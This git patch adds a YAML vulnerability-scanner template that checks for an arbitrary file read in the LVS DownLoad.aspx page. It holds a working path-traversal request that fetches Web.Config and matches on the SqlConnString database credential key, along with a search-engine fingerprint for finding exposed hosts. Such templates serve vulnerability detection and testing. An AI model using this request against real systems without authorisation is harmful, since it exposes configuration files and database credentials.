From 7bbc540a1d9ab2ef3fadf3c3e3bca3badc839b44 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 18 Jul 2024 00:31:49 +0530
Subject: [PATCH] Create lvs-download-lfi.yaml

---
 .../other/lvs-download-lfi.yaml               | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 http/vulnerabilities/other/lvs-download-lfi.yaml

diff --git a/http/vulnerabilities/other/lvs-download-lfi.yaml b/http/vulnerabilities/other/lvs-download-lfi.yaml
new file mode 100644
index 0000000000..0a129edb31
--- /dev/null
+++ b/http/vulnerabilities/other/lvs-download-lfi.yaml
@@ -0,0 +1,33 @@
+id: lvs-download-lfi
+
+info:
+  name: LVS DownLoad.aspx - LFI
+  author: pussycat0x
+  severity: high
+  description: |
+    LVS lean value management system DownLoad.aspx has an arbitrary file reading vulnerability.
+  reference:
+    - https://github.com/wy876/POC/blob/main/LVS%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FDownLoad.aspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md#lvs%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9Fdownloadaspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E
+  metadata:
+    verified: true
+    fofa-query: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
+  tags: lvs,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Business/DownLoad.aspx?p=UploadFile/../Web.Config"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<configuration>'
+          - '<appSettings>'
+          - '<add key="SqlConnString"'
+        condition: and
+
+      - type: status
+        status:
+          - 200